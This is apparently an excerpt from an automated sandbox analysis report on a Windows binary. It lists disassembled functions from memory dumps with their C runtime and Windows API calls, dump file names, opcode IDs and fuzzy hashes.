                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHookThreadWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1904029216-0
                                                                                                                • Opcode ID: da3bbf294711fff689ac05c984a8a7fc4f4ad28eb7f1b5c2a2a35fc43ba17dc4
                                                                                                                • Instruction ID: 9f73d3fec0f718b0fbbb51533cf8e855054f85a24dd3f981c94919e89ea8477a
                                                                                                                • Opcode Fuzzy Hash: da3bbf294711fff689ac05c984a8a7fc4f4ad28eb7f1b5c2a2a35fc43ba17dc4
                                                                                                                • Instruction Fuzzy Hash: 01D0A932854252AEFF203FB97C0CF2A3EAC8B09238F00038EF220A20C5CB3084C14B56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01261C30, Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2001391462-0
                                                                                                                • Opcode ID: 90afcc05d2cdf1ea45768f8c52f0c37bd232edf23b2404d373ac9a4a4de97211
                                                                                                                • Instruction ID: 1d4614e6875978b0a5d1deb819d423f9a9b0b030eb33c1874911796cf81c66ad
                                                                                                                • Opcode Fuzzy Hash: 90afcc05d2cdf1ea45768f8c52f0c37bd232edf23b2404d373ac9a4a4de97211
                                                                                                                • Instruction Fuzzy Hash: 02219E32610209AFD714DF6CC884DAABBFCFF95310B10456AEA05DB290DB71EC50CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01269C92, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 01269C99
                                                                                                                  • Part of subcall function 01270689: __EH_prolog3.LIBCMT ref: 01270690
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8H_prolog3H_prolog3_catch_Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 2399685165-0
                                                                                                                • Opcode ID: 0828688552f483625f6034cd422d6cb7b538296cbc99f5cfcad2fd8cfd3d3d69
                                                                                                                • Instruction ID: 303e5c609e4bf77bef21bde81fe299f7e3924920495187e7e538d31c48a5c4a0
                                                                                                                • Opcode Fuzzy Hash: 0828688552f483625f6034cd422d6cb7b538296cbc99f5cfcad2fd8cfd3d3d69
                                                                                                                • Instruction Fuzzy Hash: BF31D871D1024ADFCF05EF98C4809EE7BB9BF59714F14046AEA01AB281CB70A991CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10006263, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: f46ad649307b3be00dd8aab8d55ddff401d131e26564a6fde334e41b2cb259f5
                                                                                                                • Instruction ID: 11a55f501f625d2ded26613c6f0db680318b8c08764732f1b3dfacd57a40d592
                                                                                                                • Opcode Fuzzy Hash: f46ad649307b3be00dd8aab8d55ddff401d131e26564a6fde334e41b2cb259f5
                                                                                                                • Instruction Fuzzy Hash: A5019231700B10ABEA30CE5D9C44A5BBBAFEF89AE0B300419B84597249DB71A80583E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01263FD6, Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: f1c17127b0512d796440e78732031c4a892f14becdb35a4ea6894849842099cc
                                                                                                                • Instruction ID: 7c148a95c4eb62deb5db590d34a745dad418e8107fe1095392f9f74dfda67a6e
                                                                                                                • Opcode Fuzzy Hash: f1c17127b0512d796440e78732031c4a892f14becdb35a4ea6894849842099cc
                                                                                                                • Instruction Fuzzy Hash: A401C071610651AFDB28AF2DD81497ABBECFF88310700847AEA89C7250DB71D841CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1009298C, Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,10084BDB,00000000,?,00000000,00000000,00000000,?,1008A31F,?,000003BC,?,1007F6B1), ref: 100929CB
                                                                                                                  • Part of subcall function 100865AC: __getptd_noexit.LIBCMT ref: 100865AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 328603210-0
                                                                                                                • Opcode ID: 91d0eab8f17bae43ccd8adda3c0256a2d0c4d19cb7f6ea3a93a0681e99b0be37
                                                                                                                • Instruction ID: d23488348fe4c8b36847c9935be1e056379494b36f3d8b46911de445338789ba
                                                                                                                • Opcode Fuzzy Hash: 91d0eab8f17bae43ccd8adda3c0256a2d0c4d19cb7f6ea3a93a0681e99b0be37
                                                                                                                • Instruction Fuzzy Hash: 290162316416769BEB65CF259C50B9A37D4FB426A0F028226ED5EEB2D0D730EC40AB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100083DB, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: d59c5b0464ce296892ecd7f2d4e46ea5790bd27aaeb9e9bcbb3047b54bbda81e
                                                                                                                • Instruction ID: e3a508a0b13c29e206c09fe5db45470c0096638214b1d938a35bbe423d0d7ce6
                                                                                                                • Opcode Fuzzy Hash: d59c5b0464ce296892ecd7f2d4e46ea5790bd27aaeb9e9bcbb3047b54bbda81e
                                                                                                                • Instruction Fuzzy Hash: F01127B4900B02CFE725CF19C08061ABBF1FF49340B55862EE88697756CB70FA84CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10009418, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: c00b978e6a40779e42e97e39ea65df4560849621f6142654d83d43cae9d983d8
                                                                                                                • Instruction ID: 312cba863ad0a04fdcb2943330219173ed3e9b7c192f0e5476616fc3c06ac602
                                                                                                                • Opcode Fuzzy Hash: c00b978e6a40779e42e97e39ea65df4560849621f6142654d83d43cae9d983d8
                                                                                                                • Instruction Fuzzy Hash: 93F0C876204754BBE3118FA9D880E97FBD8EF9D690F14882AE649C7311D531D801C3A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01270689, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 01270690
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 3670251406-0
                                                                                                                • Opcode ID: 7e8d50654c46629689783c866697869d2da2fdcf9dbf4a2402f859f4e3ae02bb
                                                                                                                • Instruction ID: 6d0cbb98a898f757dbff97106e65752f179fd2e9b501cfe228e96c6bf3ca9ac7
                                                                                                                • Opcode Fuzzy Hash: 7e8d50654c46629689783c866697869d2da2fdcf9dbf4a2402f859f4e3ae02bb
                                                                                                                • Instruction Fuzzy Hash: F6014F75A213139FDB25BB79C42077F7A65AF913A4B244124FA14DB2C0EF70D984CB88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01264059, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: 7315811d6b7d06938694dc0f3ed35d8d9f6033de275fd0f4a563f926b92b1c05
                                                                                                                • Instruction ID: cb8f1313a5e6ab028db4bfe085d761de13191605d08d0d3026b64c0209709208
                                                                                                                • Opcode Fuzzy Hash: 7315811d6b7d06938694dc0f3ed35d8d9f6033de275fd0f4a563f926b92b1c05
                                                                                                                • Instruction Fuzzy Hash: CC015E306202138FDB54EB78C458BBDB7B5FF94345F044469E56ADB290DF309855CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100094CB, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 100094FC
                                                                                                                  • Part of subcall function 1008094B: _malloc.LIBCMT ref: 10080963
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1579825452-0
                                                                                                                • Opcode ID: 2de53b223330699279743df6dd66ba1286f9fae9357ab2214edfb12ddc6633ce
                                                                                                                • Instruction ID: 15988cf1c1c641dc7bec8bae01e08f9e5ee7acdf2ce7cfd22f17f3d28387076f
                                                                                                                • Opcode Fuzzy Hash: 2de53b223330699279743df6dd66ba1286f9fae9357ab2214edfb12ddc6633ce
                                                                                                                • Instruction Fuzzy Hash: 70F06D715047069EE7A1CF2AD800B52B7E8EB557E1F11843ED448C7295EB70E842CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01269016, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 3886170330-0
                                                                                                                • Opcode ID: 0244eb90dcfe418bffd6a67a48cd739a1af31e84800dd7f347ba34be8750a57d
                                                                                                                • Instruction ID: bb54fce01102bdf0c964f04bc02354b567519704f742f7d9682d710b5c0f03e4
                                                                                                                • Opcode Fuzzy Hash: 0244eb90dcfe418bffd6a67a48cd739a1af31e84800dd7f347ba34be8750a57d
                                                                                                                • Instruction Fuzzy Hash: A9119DB0811B458BD731AF6A814066AFBF8BFA4704B104A0FD1D687AA1D7B1A684CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000836B, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 10008383
                                                                                                                  • Part of subcall function 1007FDC4: RtlFreeHeap.NTDLL(00000000,00000000,?,1008A357,00000000,1007F6B1,00000001,00000000,?,?,?,1007F5DA,?,?,?,10001747), ref: 1007FDD8
                                                                                                                  • Part of subcall function 1007FDC4: GetLastError.KERNEL32(00000000,?,1008A357,00000000,1007F6B1,00000001,00000000,?,?,?,1007F5DA,?,?,?,10001747,?), ref: 1007FDEA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFreeHeapLast_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1353095263-0
                                                                                                                • Opcode ID: a54d104387947d55de6e660f1751253528b0506cb18e51ba30d1af79adbb4fcd
                                                                                                                • Instruction ID: df6f005bda637e4817cc1748fe3fdce529a003a1ff722eafeb605d644c8ef3d9
                                                                                                                • Opcode Fuzzy Hash: a54d104387947d55de6e660f1751253528b0506cb18e51ba30d1af79adbb4fcd
                                                                                                                • Instruction Fuzzy Hash: 64F03032504B019F9330CE56D881C47FBE9FF916A0315892FE5DA83A21EBB1B941CA64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01268180, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1579825452-0
                                                                                                                • Opcode ID: 6d766c51a48a29bd6c937c1ef687bfa1bad61298e3299caccf149e9f7c1ea61e
                                                                                                                • Instruction ID: 0fd5bd642a57a980eb7e436d173871e5a0f8343f653f7f9632f6820606d5b141
                                                                                                                • Opcode Fuzzy Hash: 6d766c51a48a29bd6c937c1ef687bfa1bad61298e3299caccf149e9f7c1ea61e
                                                                                                                • Instruction Fuzzy Hash: AAE09A72520316ABC7009F49C405B96FBECEF61770F0AC4ABDA04CF2A2C6B1E4448BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01267D2E, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateDialogIndirectParamA.USER32(00000028,?,?,00000000,01267285), ref: 01267D6B
                                                                                                                  • Part of subcall function 0126294A: OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,-00000034,?,01262A26,00000000,012A4F00,00000010,0127ED09,?,?,?,0129BD34,?,?,0000000C,0127ED62), ref: 0126295E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CreateDebugDialogIndirectOutputParamString
                                                                                                                • String ID:
                                                                                                                • API String ID: 3066322445-0
                                                                                                                • Opcode ID: 4166188f6e3bcdf2599fa558594e304da0461e50bce808520b52ccdd14d316a9
                                                                                                                • Instruction ID: efec687fc38e1da06604c096c268bf93531ef4731e482f6be83918e77906df06
                                                                                                                • Opcode Fuzzy Hash: 4166188f6e3bcdf2599fa558594e304da0461e50bce808520b52ccdd14d316a9
                                                                                                                • Instruction Fuzzy Hash: B1F03A72C2020AEBDF11EFA4D804BFD7A78BF28725F004509E610A10D1C3B585959F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100091CF, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: 5ca7bfdd84348a26d2bb517b3041e304867cdf42933037a8329fe5356c645e12
                                                                                                                • Instruction ID: a7542dbace8391972f889ddaa9c5896e65e38d56d33db264ebab61250b210ff8
                                                                                                                • Opcode Fuzzy Hash: 5ca7bfdd84348a26d2bb517b3041e304867cdf42933037a8329fe5356c645e12
                                                                                                                • Instruction Fuzzy Hash: 9FF0F879900606EBEB09CF94C541A9CB7B1FF18340B50452AE455A6A42CB31E965DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012633C1, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 012633C8
                                                                                                                  • Part of subcall function 012637EB: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0126381E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharH_prolog3MultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 354187267-0
                                                                                                                • Opcode ID: dc86cd417d7e73b5442a6fc0c88e4af0877352cc716b1885d659f8cd80b0dced
                                                                                                                • Instruction ID: aa7b951491072b77ad247a86617f0ee18437e2ff6fcad7af505607c9eb1b5005
                                                                                                                • Opcode Fuzzy Hash: dc86cd417d7e73b5442a6fc0c88e4af0877352cc716b1885d659f8cd80b0dced
                                                                                                                • Instruction Fuzzy Hash: FEE08CB032062397CF06BB18841177D2959AFB0640F004008F549AF2C4CF794A9286DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127063B, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 01270642
                                                                                                                  • Part of subcall function 01270000: EnterCriticalSection.KERNEL32(01389DA0,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 0127002F
                                                                                                                  • Part of subcall function 01270000: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270045
                                                                                                                  • Part of subcall function 01270000: LeaveCriticalSection.KERNEL32(01389DA0,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270057
                                                                                                                  • Part of subcall function 01270000: EnterCriticalSection.KERNEL32(00000000,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270063
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
